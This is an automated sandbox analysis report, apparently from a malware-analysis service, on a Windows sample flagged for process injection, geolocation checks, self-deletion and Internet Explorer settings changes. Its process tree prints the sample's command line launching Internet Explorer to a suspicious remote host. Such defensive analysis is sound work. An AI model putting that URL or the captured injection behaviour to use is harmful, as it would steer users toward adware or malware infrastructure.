7e5b54e6db6d030cf720142053170be118b9f44632404ad879434a8ffbdf7dd1

Analysis

max time kernel
93s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19/09/2024, 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
Size

104KB
MD5

ea8e8ce971c18474b6cb2fc98a45f60b
SHA1

92e6ea487de354914d5e02f3cd2f99b78c126c0c
SHA256

7e5b54e6db6d030cf720142053170be118b9f44632404ad879434a8ffbdf7dd1
SHA512

71921441d98ce9575f1a681ae0dc1f5340707a77ffa8a98ea196a97f7b809006cc8c7beb2b948fda3f5446a8b57d8f02600bd276fbb98a677f04d581fd47ae8a
SSDEEP

3072:MzjQFJbJJKcfsSbbhOpVHKhpOZ8+BXJAy+:uyVsSJOttW9

Score

7^/10

discovery

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe

Deletes itself 1 IoCs

pid	Process
4548	explorer.exe

Loads dropped DLL 19 IoCs

pid	Process
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2780 set thread context of 4548	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	123

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3400000034000000ba04000099020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2342209996"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 802f1c81490adb01	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2493928727"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039570b57fe416e4dbccca910bc3eabbd0000000002000000000010660000000100002000000085b475995616802964cde31cee086743c3af8eebf6506d248eca517b5b6f0f89000000000e80000000020000200000001a9e27c9ef504f889ea959cc3acffd291088427cf58d6696aca9b30bfa2c0836200000009e49756517653513e8d6d00e3e2cef162484231640cad999142f0c0643379b6c4000000007324735821f4b9bee142b1f56bc79be432cf530dc2c71e7d5c1c97c01b3d739b5775930980a2ac81575dd37736648bbc3bf35b6f3510d2d010e88e06241ff6f	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2249710178"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B1B57504-763C-11EF-98CC-FA5B96DB06CB} = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039570b57fe416e4dbccca910bc3eabbd000000000200000000001066000000010000200000008e06d40a966ef0e3a2b8bc8861f6f2f7eb533ed000b77251390e2dfdaae7bdb6000000000e8000000002000020000000980250f2d679a0a07779c32c793f802301d71557f5a3c6048fcbaf83941a18d9200000004b675031133b1d81de471e4ef2be9a47a4ab86697dd4cbc004afafa92d14c00f40000000eecb3b6972a6b58e0c646721a02f388bde88747953266807072407a8b7c7371df4eafc7a224755427f50bf1f5dae0801d6d3268943eaa5b96168be03e709243c	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2252522349"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039570b57fe416e4dbccca910bc3eabbd0000000002000000000010660000000100002000000039bc35837ffb69d71ca880077026afb216bea14faf159be699991fdd599a5662000000000e80000000020000200000003c40893331abd09a34b7a59c7b1a7c0ff6ca0469df6f9b2349cab4e22326c1a520000000dc9fdfaa58f5bee541e9fcbb860552699885ef231376b02a07dce17b4e2a2fb5400000008e63352cf2544ec9446041dd89a92ab875336a9d95d14be38e818996b503061f920726bf82a422d4599e7102b26d3e8556d005e6496a9a9ee5b35066df04ac6c	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0fd8e86490adb01	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B3A7C012-763C-11EF-98CC-FA5B96DB06CB} = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039570b57fe416e4dbccca910bc3eabbd0000000002000000000010660000000100002000000073b2355680234421be589c060d0fc6424a9c18aba9ed64fef320db95a7655851000000000e8000000002000020000000c74a884657ab06422df366ca1b14c64c6e9a61bae943e4e152fd77392493af1a200000003c62057f2910edb1c0f8c1a02eea0660bfcdfc04cc30bb68efd3a3df0b2789244000000029836dc6a8e8ba894a36426a59655dca4ff583759e5dd58c4578acae5ac482759247393c24a03c0006cde886c29e2624d7a95f809d856bb4577459f2801f8035	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31132233"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 306a3983490adb01	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039570b57fe416e4dbccca910bc3eabbd0000000002000000000010660000000100002000000080e36af2793ca21f76172af3404d0c4d603d17c442a48508cb2b6186f83e11cd000000000e8000000002000020000000efea5cc92805b3faa98dd03286d4e98b371abb5da3f208d46b0b257570fb7e2e2000000061e5bb5dcf543140ee48932df5c80fe3567dc1ebbe0e3f2d4d4dd4e96a496dcf4000000018e7cc3a398013717c4e84ecc08ec0bccaae3e6a024c787b898705d563331140eeceb234ba8b8c65b1b0f48c5e332d6124c54c11bbda18d69e836647f02b2640	IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
388	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 46 IoCs

pid	Process
388	IEXPLORE.EXE
388	IEXPLORE.EXE
2432	IEXPLORE.EXE
2432	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
1076	IEXPLORE.EXE
1076	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
2264	IEXPLORE.EXE
2264	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
3732	IEXPLORE.EXE
3732	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
2264	IEXPLORE.EXE
2264	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
3360	IEXPLORE.EXE
3360	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
1536	IEXPLORE.EXE
1536	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
3732	IEXPLORE.EXE
3732	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
3584	IEXPLORE.EXE
3584	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
3360	IEXPLORE.EXE
3360	IEXPLORE.EXE
4932	IEXPLORE.EXE
4932	IEXPLORE.EXE
1536	IEXPLORE.EXE
1536	IEXPLORE.EXE
1536	IEXPLORE.EXE
1536	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2060	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	83
PID 2780 wrote to memory of 2060	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	83
PID 2780 wrote to memory of 2060	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	83
PID 2060 wrote to memory of 388	2060	iexplore.exe	84
PID 2060 wrote to memory of 388	2060	iexplore.exe	84
PID 388 wrote to memory of 2432	388	IEXPLORE.EXE	85
PID 388 wrote to memory of 2432	388	IEXPLORE.EXE	85
PID 388 wrote to memory of 2432	388	IEXPLORE.EXE	85
PID 2780 wrote to memory of 1896	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	86
PID 2780 wrote to memory of 1896	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	86
PID 2780 wrote to memory of 1896	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	86
PID 1896 wrote to memory of 3256	1896	iexplore.exe	87
PID 1896 wrote to memory of 3256	1896	iexplore.exe	87
PID 2780 wrote to memory of 1300	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	92
PID 2780 wrote to memory of 1300	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	92
PID 2780 wrote to memory of 1300	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	92
PID 1300 wrote to memory of 4932	1300	iexplore.exe	93
PID 1300 wrote to memory of 4932	1300	iexplore.exe	93
PID 4932 wrote to memory of 1076	4932	IEXPLORE.EXE	94
PID 4932 wrote to memory of 1076	4932	IEXPLORE.EXE	94
PID 4932 wrote to memory of 1076	4932	IEXPLORE.EXE	94
PID 2780 wrote to memory of 4284	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	96
PID 2780 wrote to memory of 4284	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	96
PID 2780 wrote to memory of 4284	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	96
PID 4284 wrote to memory of 4936	4284	iexplore.exe	97
PID 4284 wrote to memory of 4936	4284	iexplore.exe	97
PID 4932 wrote to memory of 2264	4932	IEXPLORE.EXE	98
PID 4932 wrote to memory of 2264	4932	IEXPLORE.EXE	98
PID 4932 wrote to memory of 2264	4932	IEXPLORE.EXE	98
PID 2780 wrote to memory of 2480	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	101
PID 2780 wrote to memory of 2480	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	101
PID 2780 wrote to memory of 2480	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	101
PID 2480 wrote to memory of 3440	2480	iexplore.exe	102
PID 2480 wrote to memory of 3440	2480	iexplore.exe	102
PID 4932 wrote to memory of 3732	4932	IEXPLORE.EXE	103
PID 4932 wrote to memory of 3732	4932	IEXPLORE.EXE	103
PID 4932 wrote to memory of 3732	4932	IEXPLORE.EXE	103
PID 2780 wrote to memory of 3636	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	104
PID 2780 wrote to memory of 3636	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	104
PID 2780 wrote to memory of 3636	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	104
PID 3636 wrote to memory of 4336	3636	iexplore.exe	105
PID 3636 wrote to memory of 4336	3636	iexplore.exe	105
PID 2780 wrote to memory of 4968	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	106
PID 2780 wrote to memory of 4968	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	106
PID 2780 wrote to memory of 4968	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	106
PID 4968 wrote to memory of 4120	4968	iexplore.exe	107
PID 4968 wrote to memory of 4120	4968	iexplore.exe	107
PID 4932 wrote to memory of 3360	4932	IEXPLORE.EXE	108
PID 4932 wrote to memory of 3360	4932	IEXPLORE.EXE	108
PID 4932 wrote to memory of 3360	4932	IEXPLORE.EXE	108
PID 2780 wrote to memory of 4524	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	109
PID 2780 wrote to memory of 4524	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	109
PID 2780 wrote to memory of 4524	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	109
PID 4524 wrote to memory of 2060	4524	iexplore.exe	110
PID 4524 wrote to memory of 2060	4524	iexplore.exe	110
PID 4932 wrote to memory of 1536	4932	IEXPLORE.EXE	111
PID 4932 wrote to memory of 1536	4932	IEXPLORE.EXE	111
PID 4932 wrote to memory of 1536	4932	IEXPLORE.EXE	111
PID 2780 wrote to memory of 680	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	112
PID 2780 wrote to memory of 680	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	112
PID 2780 wrote to memory of 680	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	112
PID 680 wrote to memory of 2368	680	iexplore.exe	113
PID 680 wrote to memory of 2368	680	iexplore.exe	113
PID 2780 wrote to memory of 64	2780	ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe	114

C:\Users\Admin\AppData\Local\Temp\ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ea8e8ce971c18474b6cb2fc98a45f60b_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.asdtravel.info:251/?t=919&i=ie&66dd452da8f7726c8f0eeda8517a8bf2090df582=66dd452da8f7726c8f0eeda8517a8bf2090df582&uu=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2060
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.asdtravel.info:251/?t=919&i=ie&66dd452da8f7726c8f0eeda8517a8bf2090df582=66dd452da8f7726c8f0eeda8517a8bf2090df582&uu=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
